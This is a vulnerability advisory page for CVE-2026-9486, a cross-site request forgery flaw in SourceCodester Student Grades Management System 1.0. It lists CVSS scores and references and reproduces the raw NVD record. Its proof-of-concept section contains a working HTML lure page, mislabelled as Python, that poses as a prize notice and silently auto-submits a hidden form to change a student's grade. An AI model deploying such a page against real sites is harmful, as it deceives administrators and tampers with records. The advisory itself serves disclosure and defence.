CVE-2026-9486

Description

A security flaw has been discovered in SourceCodester Student Grades Management System 1.0. This affects an unknown part. The manipulation results in cross-site request forgery. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SourceCodester Student Grades Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2026-9486: CSRF in SourceCodester Student Grades Management System 1.0
Description: This HTML page demonstrates how an attacker could craft a malicious form to perform an action on behalf of an authenticated administrator.
Usage: Host this file on a server and trick the admin into visiting the URL.
-->
<html>
  <body>
    <h1>Congratulations! You won a prize.</h1>
    <p>Click the button below to claim it.</p>
    <!-- The form submits silently via JavaScript or on click -->
    <form action="http://target-site/student-grades-management-system/update_grade_endpoint" method="POST" id="csrf-form">
      <input type="hidden" name="student_id" value="1" />
      <input type="hidden" name="grade" value="A+" /> <!-- Malicious payload -->
      <input type="hidden" name="submit" value="Update" />
    </form>
    <script>
      // Auto-submit to simulate interaction-less attack if UI interaction is not strictly required by the user's browser settings,
      // though the CVE vector specifies UI:R (User Interaction Required).
      document.getElementById("csrf-form").submit();
    </script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9486
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9486
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9486/
[4] VulDB https://vuldb.com/cve/CVE-2026-9486
[5] https://github.com/Jack-MRJ/Student-Grades-Management-System-Vulnerability-Report
[6] https://vuldb.com/submit/814044
[7] https://vuldb.com/vuln/365467
[8] https://vuldb.com/vuln/365467/cti
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9486", "sourceIdentifier": "[email protected]", "published": "2026-05-25T20:16:37.980", "lastModified": "2026-05-25T20:16:37.980", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Student Grades Management System 1.0. This affects an unknown part. The manipulation results in cross-site request forgery. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/Jack-MRJ/Student-Grades-Management-System-Vulnerability-Report", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/814044", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365467", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365467/cti", "source": "[email protected]"}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]"}]}}